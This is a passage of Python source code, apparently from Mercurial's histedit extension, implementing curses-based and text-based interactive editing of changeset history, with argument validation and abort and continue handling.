ui, ctx, pos, action=b'pick'):\n self.ui = ui\n self.ctx = ctx\n self.action = action\n self.origpos = pos\n self.pos = pos\n self.conflicts = []\n\n def __bytes__(self):\n # Example display of several histeditrules:\n #\n # #10 pick 316392:06a16c25c053 add option to skip tests\n # #11 ^roll 316393:71313c964cc5 oops a fixup commit\n # #12 pick 316394:ab31f3973b0d include mfbt for mozilla-config.h\n # #13 ^fold 316395:14ce5803f4c3 fix warnings\n #\n # The carets point to the changeset being folded into (\"roll this\n # changeset into the changeset above\").\n return b'%s%s' % (self.prefix, self.desc)\n\n __str__ = encoding.strmethod(__bytes__)\n\n @property\n def prefix(self):\n # Some actions ('fold' and 'roll') combine a patch with a\n # previous one. Add a marker showing which patch they apply\n # to.\n action = ACTION_LABELS.get(self.action, self.action)\n\n h = self.ctx.hex()[0:12]\n r = self.ctx.rev()\n\n return b\"#%s %s %d:%s \" % (\n (b'%d' % self.origpos).ljust(2),\n action.ljust(6),\n r,\n h,\n )\n\n @util.propertycache\n def desc(self):\n summary = cmdutil.rendertemplate(\n self.ctx, self.ui.config(b'histedit', b'summary-template')\n )\n if summary:\n return summary\n # This is split off from the prefix property so that we can\n # separately make the description for 'roll' red (since it\n # will get discarded).\n return self.ctx.description().splitlines()[0].strip()\n\n def checkconflicts(self, other):\n if other.pos > self.pos and other.origpos <= self.origpos:\n if set(other.ctx.files()) & set(self.ctx.files()) != set():\n self.conflicts.append(other)\n return self.conflicts\n\n if other in self.conflicts:\n self.conflicts.remove(other)\n return self.conflicts\n\n\n# ============ EVENTS ===============\ndef movecursor(state, oldpos, newpos):\n \"\"\"Change the rule/changeset that the cursor is pointing to, regardless of\n current mode (you can switch between patches from the view patch window).\"\"\"\n state[b'pos'] = newpos\n\n mode, _ = state[b'mode']\n if mode == MODE_RULES:\n # Scroll through the list by updating the view for MODE_RULES, so that\n # even if we are not currently viewing the rules, switching back will\n # result in the cursor's rule being visible.\n modestate = state[b'modes'][MODE_RULES]\n if newpos < modestate[b'line_offset']:\n modestate[b'line_offset'] = newpos\n elif newpos > modestate[b'line_offset'] + state[b'page_height'] - 1:\n modestate[b'line_offset'] = newpos - state[b'page_height'] + 1\n\n # Reset the patch view region to the top of the new patch.\n state[b'modes'][MODE_PATCH][b'line_offset'] = 0\n\n\ndef changemode(state, mode):\n curmode, _ = state[b'mode']\n state[b'mode'] = (mode, curmode)\n if mode == MODE_PATCH:\n state[b'modes'][MODE_PATCH][b'patchcontents'] = patchcontents(state)\n\n\ndef makeselection(state, pos):\n state[b'selected'] = pos\n\n\ndef swap(state, oldpos, newpos):\n \"\"\"Swap two positions and calculate necessary conflicts in\n O(|newpos-oldpos|) time\"\"\"\n\n rules = state[b'rules']\n assert 0 <= oldpos < len(rules) and 0 <= newpos < len(rules)\n\n rules[oldpos], rules[newpos] = rules[newpos], rules[oldpos]\n\n # TODO: swap should not know about histeditrule's internals\n rules[newpos].pos = newpos\n rules[oldpos].pos = oldpos\n\n start = min(oldpos, newpos)\n end = max(oldpos, newpos)\n for r in pycompat.xrange(start, end + 1):\n rules[newpos].checkconflicts(rules[r])\n rules[oldpos].checkconflicts(rules[r])\n\n if state[b'selected']:\n makeselection(state, newpos)\n\n\ndef changeaction(state, pos, action):\n 
\"\"\"Change the action state on the given position to the new action\"\"\"\n rules = state[b'rules']\n assert 0 <= pos < len(rules)\n rules[pos].action = action\n\n\ndef cycleaction(state, pos, next=False):\n \"\"\"Changes the action state the next or the previous action from\n the action list\"\"\"\n rules = state[b'rules']\n assert 0 <= pos < len(rules)\n current = rules[pos].action\n\n assert current in KEY_LIST\n\n index = KEY_LIST.index(current)\n if next:\n index += 1\n else:\n index -= 1\n changeaction(state, pos, KEY_LIST[index % len(KEY_LIST)])\n\n\ndef changeview(state, delta, unit):\n \"\"\"Change the region of whatever is being viewed (a patch or the list of\n changesets). 'delta' is an amount (+/- 1) and 'unit' is 'page' or 'line'.\"\"\"\n mode, _ = state[b'mode']\n if mode != MODE_PATCH:\n return\n mode_state = state[b'modes'][mode]\n num_lines = len(mode_state[b'patchcontents'])\n page_height = state[b'page_height']\n unit = page_height if unit == b'page' else 1\n num_pages = 1 + (num_lines - 1) // page_height\n max_offset = (num_pages - 1) * page_height\n newline = mode_state[b'line_offset'] + delta * unit\n mode_state[b'line_offset'] = max(0, min(max_offset, newline))\n\n\ndef event(state, ch):\n \"\"\"Change state based on the current character input\n\n This takes the current state and based on the current character input from\n the user we change the state.\n \"\"\"\n selected = state[b'selected']\n oldpos = state[b'pos']\n rules = state[b'rules']\n\n if ch in (curses.KEY_RESIZE, b\"KEY_RESIZE\"):\n return E_RESIZE\n\n lookup_ch = ch\n if ch is not None and b'0' <= ch <= b'9':\n lookup_ch = b'0'\n\n curmode, prevmode = state[b'mode']\n action = KEYTABLE[curmode].get(\n lookup_ch, KEYTABLE[b'global'].get(lookup_ch)\n )\n if action is None:\n return\n if action in (b'down', b'move-down'):\n newpos = min(oldpos + 1, len(rules) - 1)\n movecursor(state, oldpos, newpos)\n if selected is not None or action == b'move-down':\n swap(state, oldpos, newpos)\n elif action in (b'up', b'move-up'):\n newpos = max(0, oldpos - 1)\n movecursor(state, oldpos, newpos)\n if selected is not None or action == b'move-up':\n swap(state, oldpos, newpos)\n elif action == b'next-action':\n cycleaction(state, oldpos, next=True)\n elif action == b'prev-action':\n cycleaction(state, oldpos, next=False)\n elif action == b'select':\n selected = oldpos if selected is None else None\n makeselection(state, selected)\n elif action == b'goto' and int(ch) < len(rules) and len(rules) <= 10:\n newrule = next((r for r in rules if r.origpos == int(ch)))\n movecursor(state, oldpos, newrule.pos)\n if selected is not None:\n swap(state, oldpos, newrule.pos)\n elif action.startswith(b'action-'):\n changeaction(state, oldpos, action[7:])\n elif action == b'showpatch':\n changemode(state, MODE_PATCH if curmode != MODE_PATCH else prevmode)\n elif action == b'help':\n changemode(state, MODE_HELP if curmode != MODE_HELP else prevmode)\n elif action == b'quit':\n return E_QUIT\n elif action == b'histedit':\n return E_HISTEDIT\n elif action == b'page-down':\n return E_PAGEDOWN\n elif action == b'page-up':\n return E_PAGEUP\n elif action == b'line-down':\n return E_LINEDOWN\n elif action == b'line-up':\n return E_LINEUP\n\n\ndef makecommands(rules):\n \"\"\"Returns a list of commands consumable by histedit --commands based on\n our list of rules\"\"\"\n commands = []\n for rules in rules:\n commands.append(b'%s %s\\n' % (rules.action, rules.ctx))\n return commands\n\n\ndef addln(win, y, x, line, color=None):\n \"\"\"Add a 
line to the given window left padding but 100% filled with\n whitespace characters, so that the color appears on the whole line\"\"\"\n maxy, maxx = win.getmaxyx()\n length = maxx - 1 - x\n line = bytes(line).ljust(length)[:length]\n if y < 0:\n y = maxy + y\n if x < 0:\n x = maxx + x\n if color:\n win.addstr(y, x, line, color)\n else:\n win.addstr(y, x, line)\n\n\ndef _trunc_head(line, n):\n if len(line) <= n:\n return line\n return b'> ' + line[-(n - 2) :]\n\n\ndef _trunc_tail(line, n):\n if len(line) <= n:\n return line\n return line[: n - 2] + b' >'\n\n\ndef patchcontents(state):\n repo = state[b'repo']\n rule = state[b'rules'][state[b'pos']]\n displayer = logcmdutil.changesetdisplayer(\n repo.ui, repo, {b\"patch\": True, b\"template\": b\"status\"}, buffered=True\n )\n overrides = {(b'ui', b'verbose'): True}\n with repo.ui.configoverride(overrides, source=b'histedit'):\n displayer.show(rule.ctx)\n displayer.close()\n return displayer.hunk[rule.ctx.rev()].splitlines()\n\n\ndef _chisteditmain(repo, rules, stdscr):\n try:\n curses.use_default_colors()\n except curses.error:\n pass\n\n # initialize color pattern\n curses.init_pair(COLOR_HELP, curses.COLOR_WHITE, curses.COLOR_BLUE)\n curses.init_pair(COLOR_SELECTED, curses.COLOR_BLACK, curses.COLOR_WHITE)\n curses.init_pair(COLOR_WARN, curses.COLOR_BLACK, curses.COLOR_YELLOW)\n curses.init_pair(COLOR_OK, curses.COLOR_BLACK, curses.COLOR_GREEN)\n curses.init_pair(COLOR_CURRENT, curses.COLOR_WHITE, curses.COLOR_MAGENTA)\n curses.init_pair(COLOR_DIFF_ADD_LINE, curses.COLOR_GREEN, -1)\n curses.init_pair(COLOR_DIFF_DEL_LINE, curses.COLOR_RED, -1)\n curses.init_pair(COLOR_DIFF_OFFSET, curses.COLOR_MAGENTA, -1)\n curses.init_pair(COLOR_ROLL, curses.COLOR_RED, -1)\n curses.init_pair(\n COLOR_ROLL_CURRENT, curses.COLOR_BLACK, curses.COLOR_MAGENTA\n )\n curses.init_pair(COLOR_ROLL_SELECTED, curses.COLOR_RED, curses.COLOR_WHITE)\n\n # don't display the cursor\n try:\n curses.curs_set(0)\n except curses.error:\n pass\n\n def rendercommit(win, state):\n \"\"\"Renders the commit window that shows the log of the current selected\n commit\"\"\"\n pos = state[b'pos']\n rules = state[b'rules']\n rule = rules[pos]\n\n ctx = rule.ctx\n win.box()\n\n maxy, maxx = win.getmaxyx()\n length = maxx - 3\n\n line = b\"changeset: %d:%s\" % (ctx.rev(), ctx.hex()[:12])\n win.addstr(1, 1, line[:length])\n\n line = b\"user: %s\" % ctx.user()\n win.addstr(2, 1, line[:length])\n\n bms = repo.nodebookmarks(ctx.node())\n line = b\"bookmark: %s\" % b' '.join(bms)\n win.addstr(3, 1, line[:length])\n\n line = b\"summary: %s\" % (ctx.description().splitlines()[0])\n win.addstr(4, 1, line[:length])\n\n line = b\"files: \"\n win.addstr(5, 1, line)\n fnx = 1 + len(line)\n fnmaxx = length - fnx + 1\n y = 5\n fnmaxn = maxy - (1 + y) - 1\n files = ctx.files()\n for i, line1 in enumerate(files):\n if len(files) > fnmaxn and i == fnmaxn - 1:\n win.addstr(y, fnx, _trunc_tail(b','.join(files[i:]), fnmaxx))\n y = y + 1\n break\n win.addstr(y, fnx, _trunc_head(line1, fnmaxx))\n y = y + 1\n\n conflicts = rule.conflicts\n if len(conflicts) > 0:\n conflictstr = b','.join(map(lambda r: r.ctx.hex()[:12], conflicts))\n conflictstr = b\"changed files overlap with %s\" % conflictstr\n else:\n conflictstr = b'no overlap'\n\n win.addstr(y, 1, conflictstr[:length])\n win.noutrefresh()\n\n def helplines(mode):\n if mode == MODE_PATCH:\n help = b\"\"\"\\\n?: help, k/up: line up, j/down: line down, v: stop viewing patch\npgup: prev page, space/pgdn: next page, c: commit, q: abort\n\"\"\"\n else:\n help = 
b\"\"\"\\\n?: help, k/up: move up, j/down: move down, space: select, v: view patch\nd: drop, e: edit, f: fold, m: mess, p: pick, r: roll\npgup/K: move patch up, pgdn/J: move patch down, c: commit, q: abort\n\"\"\"\n return help.splitlines()\n\n def renderhelp(win, state):\n maxy, maxx = win.getmaxyx()\n mode, _ = state[b'mode']\n for y, line in enumerate(helplines(mode)):\n if y >= maxy:\n break\n addln(win, y, 0, line, curses.color_pair(COLOR_HELP))\n win.noutrefresh()\n\n def renderrules(rulesscr, state):\n rules = state[b'rules']\n pos = state[b'pos']\n selected = state[b'selected']\n start = state[b'modes'][MODE_RULES][b'line_offset']\n\n conflicts = [r.ctx for r in rules if r.conflicts]\n if len(conflicts) > 0:\n line = b\"potential conflict in %s\" % b','.join(\n map(pycompat.bytestr, conflicts)\n )\n addln(rulesscr, -1, 0, line, curses.color_pair(COLOR_WARN))\n\n for y, rule in enumerate(rules[start:]):\n if y >= state[b'page_height']:\n break\n if len(rule.conflicts) > 0:\n rulesscr.addstr(y, 0, b\" \", curses.color_pair(COLOR_WARN))\n else:\n rulesscr.addstr(y, 0, b\" \", curses.COLOR_BLACK)\n\n if y + start == selected:\n rollcolor = COLOR_ROLL_SELECTED\n addln(rulesscr, y, 2, rule, curses.color_pair(COLOR_SELECTED))\n elif y + start == pos:\n rollcolor = COLOR_ROLL_CURRENT\n addln(\n rulesscr,\n y,\n 2,\n rule,\n curses.color_pair(COLOR_CURRENT) | curses.A_BOLD,\n )\n else:\n rollcolor = COLOR_ROLL\n addln(rulesscr, y, 2, rule)\n\n if rule.action == b'roll':\n rulesscr.addstr(\n y,\n 2 + len(rule.prefix),\n rule.desc,\n curses.color_pair(rollcolor),\n )\n\n rulesscr.noutrefresh()\n\n def renderstring(win, state, output, diffcolors=False):\n maxy, maxx = win.getmaxyx()\n length = min(maxy - 1, len(output))\n for y in range(0, length):\n line = output[y]\n if diffcolors:\n if line and line[0] == b'+':\n win.addstr(\n y, 0, line, curses.color_pair(COLOR_DIFF_ADD_LINE)\n )\n elif line and line[0] == b'-':\n win.addstr(\n y, 0, line, curses.color_pair(COLOR_DIFF_DEL_LINE)\n )\n elif line.startswith(b'@@ '):\n win.addstr(y, 0, line, curses.color_pair(COLOR_DIFF_OFFSET))\n else:\n win.addstr(y, 0, line)\n else:\n win.addstr(y, 0, line)\n win.noutrefresh()\n\n def renderpatch(win, state):\n start = state[b'modes'][MODE_PATCH][b'line_offset']\n content = state[b'modes'][MODE_PATCH][b'patchcontents']\n renderstring(win, state, content[start:], diffcolors=True)\n\n def layout(mode):\n maxy, maxx = stdscr.getmaxyx()\n helplen = len(helplines(mode))\n mainlen = maxy - helplen - 12\n if mainlen < 1:\n raise error.Abort(\n _(b\"terminal dimensions %d by %d too small for curses histedit\")\n % (maxy, maxx),\n hint=_(\n b\"enlarge your terminal or use --config ui.interface=text\"\n ),\n )\n return {\n b'commit': (12, maxx),\n b'help': (helplen, maxx),\n b'main': (mainlen, maxx),\n }\n\n def drawvertwin(size, y, x):\n win = curses.newwin(size[0], size[1], y, x)\n y += size[0]\n return win, y, x\n\n state = {\n b'pos': 0,\n b'rules': rules,\n b'selected': None,\n b'mode': (MODE_INIT, MODE_INIT),\n b'page_height': None,\n b'modes': {\n MODE_RULES: {\n b'line_offset': 0,\n },\n MODE_PATCH: {\n b'line_offset': 0,\n },\n },\n b'repo': repo,\n }\n\n # eventloop\n ch = None\n stdscr.clear()\n stdscr.refresh()\n while True:\n oldmode, unused = state[b'mode']\n if oldmode == MODE_INIT:\n changemode(state, MODE_RULES)\n e = event(state, ch)\n\n if e == E_QUIT:\n return False\n if e == E_HISTEDIT:\n return state[b'rules']\n else:\n if e == E_RESIZE:\n size = screen_size()\n if size != stdscr.getmaxyx():\n 
curses.resizeterm(*size)\n\n curmode, unused = state[b'mode']\n sizes = layout(curmode)\n if curmode != oldmode:\n state[b'page_height'] = sizes[b'main'][0]\n # Adjust the view to fit the current screen size.\n movecursor(state, state[b'pos'], state[b'pos'])\n\n # Pack the windows against the top, each pane spread across the\n # full width of the screen.\n y, x = (0, 0)\n helpwin, y, x = drawvertwin(sizes[b'help'], y, x)\n mainwin, y, x = drawvertwin(sizes[b'main'], y, x)\n commitwin, y, x = drawvertwin(sizes[b'commit'], y, x)\n\n if e in (E_PAGEDOWN, E_PAGEUP, E_LINEDOWN, E_LINEUP):\n if e == E_PAGEDOWN:\n changeview(state, +1, b'page')\n elif e == E_PAGEUP:\n changeview(state, -1, b'page')\n elif e == E_LINEDOWN:\n changeview(state, +1, b'line')\n elif e == E_LINEUP:\n changeview(state, -1, b'line')\n\n # start rendering\n commitwin.erase()\n helpwin.erase()\n mainwin.erase()\n if curmode == MODE_PATCH:\n renderpatch(mainwin, state)\n elif curmode == MODE_HELP:\n renderstring(mainwin, state, __doc__.strip().splitlines())\n else:\n renderrules(mainwin, state)\n rendercommit(commitwin, state)\n renderhelp(helpwin, state)\n curses.doupdate()\n # done rendering\n ch = encoding.strtolocal(stdscr.getkey())\n\n\ndef _chistedit(ui, repo, freeargs, opts):\n \"\"\"interactively edit changeset history via a curses interface\n\n Provides a ncurses interface to histedit. Press ? in chistedit mode\n to see an extensive help. Requires python-curses to be installed.\"\"\"\n\n if curses is None:\n raise error.Abort(_(b\"Python curses library required\"))\n\n # disable color\n ui._colormode = None\n\n try:\n keep = opts.get(b'keep')\n revs = opts.get(b'rev', [])[:]\n cmdutil.checkunfinished(repo)\n cmdutil.bailifchanged(repo)\n\n if os.path.exists(os.path.join(repo.path, b'histedit-state')):\n raise error.Abort(\n _(\n b'history edit already in progress, try '\n b'--continue or --abort'\n )\n )\n revs.extend(freeargs)\n if not revs:\n defaultrev = destutil.desthistedit(ui, repo)\n if defaultrev is not None:\n revs.append(defaultrev)\n if len(revs) != 1:\n raise error.Abort(\n _(b'histedit requires exactly one ancestor revision')\n )\n\n rr = list(repo.set(b'roots(%ld)', scmutil.revrange(repo, revs)))\n if len(rr) != 1:\n raise error.Abort(\n _(\n b'The specified revisions must have '\n b'exactly one common root'\n )\n )\n root = rr[0].node()\n\n topmost = repo.dirstate.p1()\n revs = between(repo, root, topmost, keep)\n if not revs:\n raise error.Abort(\n _(b'%s is not an ancestor of working directory') % short(root)\n )\n\n ctxs = []\n for i, r in enumerate(revs):\n ctxs.append(histeditrule(ui, repo[r], i))\n with util.with_lc_ctype():\n rc = curses.wrapper(functools.partial(_chisteditmain, repo, ctxs))\n curses.echo()\n curses.endwin()\n if rc is False:\n ui.write(_(b\"histedit aborted\\n\"))\n return 0\n if type(rc) is list:\n ui.status(_(b\"performing changes\\n\"))\n rules = makecommands(rc)\n with repo.vfs(b'chistedit', b'w+') as fp:\n for r in rules:\n fp.write(r)\n opts[b'commands'] = fp.name\n return _texthistedit(ui, repo, freeargs, opts)\n except KeyboardInterrupt:\n pass\n return -1\n\n\n@command(\n b'histedit',\n [\n (\n b'',\n b'commands',\n b'',\n _(b'read history edits from the specified file'),\n _(b'FILE'),\n ),\n (b'c', b'continue', False, _(b'continue an edit already in progress')),\n (b'', b'edit-plan', False, _(b'edit remaining actions list')),\n (\n b'k',\n b'keep',\n False,\n _(b\"don't strip old nodes after edit is complete\"),\n ),\n (b'', b'abort', False, _(b'abort an edit in 
progress')),\n (b'o', b'outgoing', False, _(b'changesets not found in destination')),\n (\n b'f',\n b'force',\n False,\n _(b'force outgoing even for unrelated repositories'),\n ),\n (b'r', b'rev', [], _(b'first revision to be edited'), _(b'REV')),\n ]\n + cmdutil.formatteropts,\n _(b\"[OPTIONS] ([ANCESTOR] | --outgoing [URL])\"),\n helpcategory=command.CATEGORY_CHANGE_MANAGEMENT,\n)\ndef histedit(ui, repo, *freeargs, **opts):\n \"\"\"interactively edit changeset history\n\n This command lets you edit a linear series of changesets (up to\n and including the working directory, which should be clean).\n You can:\n\n - `pick` to [re]order a changeset\n\n - `drop` to omit changeset\n\n - `mess` to reword the changeset commit message\n\n - `fold` to combine it with the preceding changeset (using the later date)\n\n - `roll` like fold, but discarding this commit's description and date\n\n - `edit` to edit this changeset (preserving date)\n\n - `base` to checkout changeset and apply further changesets from there\n\n There are a number of ways to select the root changeset:\n\n - Specify ANCESTOR directly\n\n - Use --outgoing -- it will be the first linear changeset not\n included in destination. (See :hg:`help config.paths.default-push`)\n\n - Otherwise, the value from the \"histedit.defaultrev\" config option\n is used as a revset to select the base revision when ANCESTOR is not\n specified. The first revision returned by the revset is used. By\n default, this selects the editable history that is unique to the\n ancestry of the working directory.\n\n .. container:: verbose\n\n If you use --outgoing, this command will abort if there are ambiguous\n outgoing revisions. For example, if there are multiple branches\n containing outgoing revisions.\n\n Use \"min(outgoing() and ::.)\" or similar revset specification\n instead of --outgoing to specify edit target revision exactly in\n such ambiguous situation. See :hg:`help revsets` for detail about\n selecting revisions.\n\n .. 
container:: verbose\n\n Examples:\n\n - A number of changes have been made.\n Revision 3 is no longer needed.\n\n Start history editing from revision 3::\n\n hg histedit -r 3\n\n An editor opens, containing the list of revisions,\n with specific actions specified::\n\n pick 5339bf82f0ca 3 Zworgle the foobar\n pick 8ef592ce7cc4 4 Bedazzle the zerlog\n pick 0a9639fcda9d 5 Morgify the cromulancy\n\n Additional information about the possible actions\n to take appears below the list of revisions.\n\n To remove revision 3 from the history,\n its action (at the beginning of the relevant line)\n is changed to 'drop'::\n\n drop 5339bf82f0ca 3 Zworgle the foobar\n pick 8ef592ce7cc4 4 Bedazzle the zerlog\n pick 0a9639fcda9d 5 Morgify the cromulancy\n\n - A number of changes have been made.\n Revision 2 and 4 need to be swapped.\n\n Start history editing from revision 2::\n\n hg histedit -r 2\n\n An editor opens, containing the list of revisions,\n with specific actions specified::\n\n pick 252a1af424ad 2 Blorb a morgwazzle\n pick 5339bf82f0ca 3 Zworgle the foobar\n pick 8ef592ce7cc4 4 Bedazzle the zerlog\n\n To swap revision 2 and 4, its lines are swapped\n in the editor::\n\n pick 8ef592ce7cc4 4 Bedazzle the zerlog\n pick 5339bf82f0ca 3 Zworgle the foobar\n pick 252a1af424ad 2 Blorb a morgwazzle\n\n Returns 0 on success, 1 if user intervention is required (not only\n for intentional \"edit\" command, but also for resolving unexpected\n conflicts).\n \"\"\"\n opts = pycompat.byteskwargs(opts)\n\n # kludge: _chistedit only works for starting an edit, not aborting\n # or continuing, so fall back to regular _texthistedit for those\n # operations.\n if ui.interface(b'histedit') == b'curses' and _getgoal(opts) == goalnew:\n return _chistedit(ui, repo, freeargs, opts)\n return _texthistedit(ui, repo, freeargs, opts)\n\n\ndef _texthistedit(ui, repo, freeargs, opts):\n state = histeditstate(repo)\n with repo.wlock() as wlock, repo.lock() as lock:\n state.wlock = wlock\n state.lock = lock\n _histedit(ui, repo, state, freeargs, opts)\n\n\ngoalcontinue = b'continue'\ngoalabort = b'abort'\ngoaleditplan = b'edit-plan'\ngoalnew = b'new'\n\n\ndef _getgoal(opts):\n if opts.get(b'continue'):\n return goalcontinue\n if opts.get(b'abort'):\n return goalabort\n if opts.get(b'edit_plan'):\n return goaleditplan\n return goalnew\n\n\ndef _readfile(ui, path):\n if path == b'-':\n with ui.timeblockedsection(b'histedit'):\n return ui.fin.read()\n else:\n with open(path, b'rb') as f:\n return f.read()\n\n\ndef _validateargs(ui, repo, state, freeargs, opts, goal, rules, revs):\n # TODO only abort if we try to histedit mq patches, not just\n # blanket if mq patches are applied somewhere\n mq = getattr(repo, 'mq', None)\n if mq and mq.applied:\n raise error.Abort(_(b'source has mq patches applied'))\n\n # basic argument incompatibility processing\n outg = opts.get(b'outgoing')\n editplan = opts.get(b'edit_plan')\n abort = opts.get(b'abort')\n force = opts.get(b'force')\n if force and not outg:\n raise error.Abort(_(b'--force only allowed with --outgoing'))\n if goal == b'continue':\n if any((outg, abort, revs, freeargs, rules, editplan)):\n raise error.Abort(_(b'no arguments allowed with --continue'))\n elif goal == b'abort':\n if any((outg, revs, freeargs, rules, editplan)):\n raise error.Abort(_(b'no arguments allowed with --abort'))\n elif goal == b'edit-plan':\n if any((outg, revs, freeargs)):\n raise error.Abort(\n _(b'only --commands argument allowed with --edit-plan')\n )\n else:\n if state.inprogress():\n raise 
error.Abort(\n _(\n b'history edit already in progress, try '\n b'--continue or --abort'\n )\n )\n if outg:\n if revs:\n raise error.Abort(_(b'no revisions allowed with --outgoing'))\n if len(freeargs) > 1:\n raise error.Abort(\n _(b'only one repo argument allowed with --outgoing')\n )\n else:\n revs.extend(freeargs)\n if len(revs) == 0:\n defaultrev = destutil.desthistedit(ui, repo)\n if defaultrev is not None:\n revs.append(defaultrev)\n\n if len(revs) != 1:\n raise error.Abort(\n _(b'histedit requires exactly one ancestor revision')\n )\n\n\ndef _histedit(ui, repo, state, freeargs, opts):\n fm = ui.formatter(b'histedit', opts)\n fm.startitem()\n goal = _getgoal(opts)\n revs = opts.get(b'rev', [])\n nobackup = not ui.configbool(b'rewrite', b'backup-bundle')\n rules = opts.get(b'commands', b'')\n state.keep = opts.get(b'keep', False)\n\n _validateargs(ui, repo, state, freeargs, opts, goal, rules, revs)\n\n hastags = False\n if revs:\n revs = scmutil.revrange(repo, revs)\n ctxs = [repo[rev] for rev in revs]\n for ctx in ctxs:\n tags = [tag for tag in ctx.tags() if tag != b'tip']\n if not hastags:\n hastags = len(tags)\n if hastags:\n if ui.promptchoice(\n _(\n b'warning: tags associated with the given'\n b' changeset will be lost after histedit.\\n'\n b'do you want to continue (yN)? $$ &Yes $$ &No'\n ),\n default=1,\n ):\n raise error.Abort(_(b'histedit cancelled\\n'))\n # rebuild state\n if goal == goalcontinue:\n state.read()\n state = bootstrapcontinue(ui, state, opts)\n elif goal == goaleditplan:\n _edithisteditplan(ui, repo, state, rules)\n return\n elif goal == goalabort:\n _aborthistedit(ui, repo, state, nobackup=nobackup)\n return\n else:\n # goal == goalnew\n _newhistedit(ui, repo, state, revs, freeargs, opts)\n\n _continuehistedit(ui, repo, state)\n _finishhistedit(ui, repo, state, fm)\n fm.end()\n\n\ndef _continuehistedit(ui, repo, state):\n \"\"\"This function runs after either:\n - bootstrapcontinue (if the goal is 'continue')\n - _newhistedit (if the goal is 'new')\n \"\"\"\n # preprocess rules so that we can hide inner folds from the user\n # and only show one editor\n actions = state.actions[:]\n for idx, (action, nextact) in enumerate(zip(actions, actions[1:] + [None])):\n if action.verb == b'fold' and nextact and nextact.verb == b'fold':\n state.actions[idx].__class__ = _multifold\n\n # Force an initial state file write, so the user can run --abort/continue\n # even if there's an exception before the first transaction serialize.\n state.write()\n\n tr = None\n # Don't use singletransaction by default since it rolls the entire\n # transaction back if an unexpected exception happens (like a\n # pretxncommit hook throws, or the user aborts the commit msg editor).\n if ui.configbool(b\"histedit\", b\"singletransaction\"):\n # Don't use a 'with' for the transaction, since actions may close\n # and reopen a transaction. 
For example, if the action executes an\n # external process it may choose to commit the transaction first.\n tr = repo.transaction(b'histedit')\n progress = ui.makeprogress(\n _(b\"editing\"), unit=_(b'changes'), total=len(state.actions)\n )\n with progress, util.acceptintervention(tr):\n while state.actions:\n state.write(tr=tr)\n actobj = state.actions[0]\n progress.increment(item=actobj.torule())\n ui.debug(\n b'histedit: processing %s %s\\n' % (actobj.verb, actobj.torule())\n )\n parentctx, replacement_ = actobj.run()\n state.parentctxnode = parentctx.node()\n state.replacements.extend(replacement_)\n state.actions.pop(0)\n\n state.write()\n\n\ndef _finishhistedit(ui, repo, state, fm):\n \"\"\"This action runs when histedit is finishing its session\"\"\"\n mergemod.update(repo[state.parentctxnode])\n\n mapping, tmpnodes, created, ntm = processreplacement(state)\n if mapping:\n for prec, succs in pycompat.iteritems(mapping):\n if not succs:\n ui.debug(b'histedit: %s is dropped\\n' % short(prec))\n else:\n ui.debug(\n b'histedit: %s is replaced by %s\\n'\n % (short(prec), short(succs[0]))\n )\n if len(succs) > 1:\n m = b'histedit: %s'\n for n in succs[1:]:\n ui.debug(m % short(n))\n\n if not state.keep:\n if mapping:\n movetopmostbookmarks(repo, state.topmost, ntm)\n # TODO update mq state\n else:\n mapping = {}\n\n for n in tmpnodes:\n if n in repo:\n mapping[n] = ()\n\n # remove entries about unknown nodes\n has_node = repo.unfiltered().changelog.index.has_node\n mapping = {\n k: v\n for k, v in mapping.items()\n if has_node(k) and all(has_node(n) for n in v)\n }\n scmutil.cleanupnodes(repo, mapping, b'histedit')\n hf = fm.hexfunc\n fl = fm.formatlist\n fd = fm.formatdict\n nodechanges = fd(\n {\n hf(oldn): fl([hf(n) for n in newn], name=b'node')\n for oldn, newn in pycompat.iteritems(mapping)\n },\n key=b\"oldnode\",\n value=b\"newnodes\",\n )\n fm.data(nodechanges=nodechanges)\n\n state.clear()\n if os.path.exists(repo.sjoin(b'undo')):\n os.unlink(repo.sjoin(b'undo'))\n if repo.vfs.exists(b'histedit-last-edit.txt'):\n repo.vfs.unlink(b'histedit-last-edit.txt')\n\n\ndef _aborthistedit(ui, repo, state, nobackup=False):\n try:\n state.read()\n __, leafs, tmpnodes, __ = processreplacement(state)\n ui.debug(b'restore wc to old parent %s\\n' % short(state.topmost))\n\n # Recover our old commits if necessary\n if not state.topmost in repo and state.backupfile:\n backupfile = repo.vfs.join(state.backupfile)\n f = hg.openpath(ui, backupfile)\n gen = exchange.readbundle(ui, f, backupfile)\n with repo.transaction(b'histedit.abort') as tr:\n bundle2.applybundle(\n repo,\n gen,\n tr,\n source=b'histedit',\n url=b'bundle:' + backupfile,\n )\n\n os.remove(backupfile)\n\n # check whether we should update away\n if repo.unfiltered().revs(\n b'parents() and (%n or %ln::)',\n state.parentctxnode,\n leafs | tmpnodes,\n ):\n hg.clean(repo, state.topmost, show_stats=True, quietempty=True)\n cleanupnode(ui, repo, tmpnodes, nobackup=nobackup)\n cleanupnode(ui, repo, leafs, nobackup=nobackup)\n except Exception:\n if state.inprogress():\n ui.warn(\n _(\n b'warning: encountered an exception during histedit '\n b'--abort; the repository may not have been completely '\n b'cleaned up\\n'\n )\n )\n raise\n finally:\n state.clear()\n\n\ndef hgaborthistedit(ui, repo):\n state = histeditstate(repo)\n nobackup = not ui.configbool(b'rewrite', b'backup-bundle')\n with repo.wlock() as wlock, repo.lock() as lock:\n state.wlock = wlock\n state.lock = lock\n _aborthistedit(ui, repo, state, nobackup=nobackup)\n\n\ndef 
_edithisteditplan(ui, repo, state, rules):\n state.read()\n if not rules:\n comment = geteditcomment(\n ui, short(state.parentctxnode), short(state.topmost)\n )\n rules = ruleeditor(repo, ui, state.actions, comment)\n else:\n rules = _readfile(ui, rules)\n actions = parserules(rules, state)\n ctxs = [repo[act.node] for act in state.actions if act.node]\n warnverifyactions(ui, repo, actions, state, ctxs)\n state.actions = actions\n state.write()\n\n\ndef _newhistedit(ui, repo, state, revs, freeargs, opts):\n outg = opts.get(b'outgoing')\n rules = opts.get(b'commands', b'')\n force = opts.get(b'force')\n\n cmdutil.checkunfinished(repo)\n cmdutil.bailifchanged(repo)\n\n topmost = repo.dirstate.p1()\n if outg:\n if freeargs:\n remote = freeargs[0]\n else:\n remote = None\n root = findoutgoing(ui, repo, remote, force, opts)\n else:\n rr = list(repo.set(b'roots(%ld)', scmutil.revrange(repo, revs)))\n if len(rr) != 1:\n raise error.Abort(\n _(\n b'The specified revisions must have '\n b'exactly one common root'\n )\n )\n root = rr[0].node()\n\n revs = between(repo, root, topmost, state.keep)\n if not revs:\n raise error.Abort(\n _(b'%s is not an ancestor of working directory') % short(root)\n )\n\n 